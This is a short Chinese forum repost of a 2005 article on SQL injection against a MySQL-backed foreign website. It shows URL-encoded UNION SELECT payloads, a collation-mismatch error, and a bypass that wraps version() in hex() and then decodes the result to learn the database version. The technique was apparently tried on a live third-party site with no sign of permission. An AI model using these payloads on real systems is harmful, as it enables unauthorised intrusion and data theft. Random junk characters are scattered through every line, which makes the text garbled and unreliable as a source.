本文作者:SuperHei$ [0 i- [. m" ]2 j3 o7 X
文章性质:原创/ e+ w: k- f: V' N3 ]+ Q
发布日期:2005-10-18
1 w, k# X0 H) N5 u. W m测试个国外的站时:
! `" i( ^: c$ N2 S- s. @url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
0 X, f; y. i; \ y1 S* U& S3 T* X返回错误:2 l5 F0 ]) `& w, d
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
3 N( k. ^! g! ^9 }: @6 b; HMySQL Error No. 126. N3 p. F \& ~( V. l/ N
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。$ I8 b0 P6 l0 o% J# o; l* I; C
解决办法:转为其他编码如hex。
& x/ ?+ X/ j: ^3 c0 e+ ~% F& Uurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
" Q' K+ O" p$ p0 w5 N成功得到hex(version())的值为:/ m* b, s. P4 p6 s. Q8 a4 D
342E312E332D626574610 z1 L2 s) @* {# I1 g: w3 m2 X
回Mysql查询下得到:
/ |. c* A7 K; f9 H; B# ^# Vmysql> select 0x342E312E332D62657461;$ N6 W3 ~1 @: }' H- q! Q
+------------------------+
6 U5 i0 [6 M3 d: {| 0x342E312E332D62657461 |
3 R. m# ?& T5 V1 C! {+------------------------+
! `! V: U2 W* n; _' W| 4.1.3-beta |: B/ U$ H& C, K6 m6 {
+------------------------+
5 w! ]8 S5 N6 U: e3 F1 row in set (0.00 sec)- N$ P9 W) b0 T" w
' ]( m4 p7 r' T* E+ |+ q/ E
|
发表于 2012-9-15 14:04:54
收藏
支持
反对